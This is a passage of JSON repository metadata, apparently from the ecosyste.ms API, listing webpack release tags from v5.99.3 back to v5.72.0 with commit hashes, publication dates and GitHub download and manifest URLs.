hub.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@